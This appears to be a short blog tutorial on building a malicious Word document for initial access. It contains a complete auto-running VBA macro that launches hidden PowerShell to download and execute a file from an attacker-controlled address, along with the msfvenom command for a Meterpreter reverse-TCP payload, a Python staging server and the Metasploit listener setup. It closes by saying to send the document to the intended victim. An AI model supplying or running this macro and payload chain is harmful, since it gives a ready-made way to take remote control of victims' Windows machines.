Initial access using a Malicious Document(MalDoc)

Hussain
3 min readAug 29, 2023

--

Setup:

  1. Linux environment(Attacker)
  • Metasploit
  • Python

2. Windows environment(Target)

  • Disabled windows defender
  • MS Office

1. Developing a Malicious Document (MalDoc): Techniques and Considerations

First, we will create a document containing an embedded macro. When the document is opened, the macro will automatically execute, initiating the download of a malicious Meterpreter payload and subsequently executing it.

Follow the steps:

  1. Create any MS document file with the name of your choice.

2. Open the document and go to the View menu. From there, choose the Macro option and select View Macro.

3. Provide a name for your macro and select a name for the document where you want to save the macro. Finally, click on the Create button.

4. Copy the vb code below replacing your target IP and PORT.

Sub Exec()
Dim shell
Set shell = CreateObject("WScript.Shell")

Dim scriptName
scriptName = "test.exe"

Dim scriptPath
scriptPath = shell.CurrentDirectory & "\" & scriptName

Dim command
command = "powershell -ExecutionPolicy Bypass -Command ""$webClient = New-Object System.Net.WebClient; $sourceUrl = 'http://192.168.186.130:8000/" & scriptName & "'; $destinationPath = '" & scriptPath & "'; $webClient.DownloadFile($sourceUrl, $destinationPath); & '" & scriptPath & "'"""

shell.Run command, 0, True

End Sub

Sub AutoOpen()
Exec
End Sub

The provided VBA code downloads an executable file from a specified URL and saves it to the current directory. It then executes the downloaded file using the Windows Script Shell. The code is triggered when the workbook containing the code is opened.

5. Save and close the document.

2. Generating and Staging a Meterpreter Executable from Metasploit

Create a Windows executable on your attacker machine utilizing the msfvenom tool.

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.186.130 LPORT=4443 -f exe -o test.exe

Utilize the Python http.server module to host and distribute the payload.

python3 -m http.server

The payload should be saved in the same directory where the program is run.

3. Execution and reverse shell

To configure the listener in the Metasploit Framework, follow the below commads.

msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.186.130
set lport 4443
exploit

Once the listener is actively waiting for connections, proceed with sending the malicious document to the intended victim. Then, assuming the role of the victim, open the document and click on the button that enables the document’s functionality.

This will pop up a reverse meterpreter shell.

--

--